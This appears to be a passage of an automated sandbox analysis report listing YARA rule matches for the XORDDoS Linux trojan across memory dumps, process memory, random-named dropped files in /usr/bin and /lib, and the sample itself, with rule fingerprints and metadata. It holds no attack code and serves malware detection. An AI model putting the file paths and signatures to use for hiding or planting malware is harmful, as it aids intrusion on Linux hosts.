            Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10082.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10313.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9937.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10060.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
            Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9451, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9454, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9457, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9462, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9552, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9563, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9574, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9585, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9596, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9607, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9618, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9629, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9640, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9651, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9662, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9673, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9684, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9695, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9706, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9717, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9728, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9739, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9750, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9761, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9772, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9783, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9794, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9805, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9816, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9827, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9838, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9849, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9860, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9871, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9882, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9893, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9904, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9915, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9926, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9937, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9948, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9959, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9970, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9981, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 9994, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 10005, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 10016, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 10027, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 10038, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 10049, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: Process Memory Space: iJl2Sb6qRa PID: 10060, type: MEMORYSTRMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /lib/libudev.so, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /lib/libudev.so, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /lib/libudev.so, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/wzhmvohlxs, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/wzhmvohlxs, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/wzhmvohlxs, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/emnaztxelb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/hiueshutol, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/hiueshutol, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/hiueshutol, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/mhvrcmaysv, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/mhvrcmaysv, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/mhvrcmaysv, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/lnmgbribvb, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/lnmgbribvb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/lnmgbribvb, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/hgfzmygnbx, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/wdcujvrbpo, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/hgfzmygnbx, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/hgfzmygnbx, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/wdcujvrbpo, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/wdcujvrbpo, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/dezqblvxuy, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/dezqblvxuy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/dezqblvxuy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/chdmwyeiia, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/chdmwyeiia, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/chdmwyeiia, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/ckxgqrmzxa, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/ckxgqrmzxa, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/ckxgqrmzxa, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/lsodknzpps, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/lsodknzpps, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/lsodknzpps, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/eoqlmyvucn, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/eoqlmyvucn, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/eoqlmyvucn, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/cjfywultqo, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/cjfywultqo, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/cjfywultqo, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: /usr/bin/zbksjhrfms, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
            Source: /usr/bin/zbksjhrfms, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
            Source: /usr/bin/zbksjhrfms, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
            Source: iJl2Sb6qRa, type: SAMPLEMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: iJl2Sb6qRa, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: iJl2Sb6qRa, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
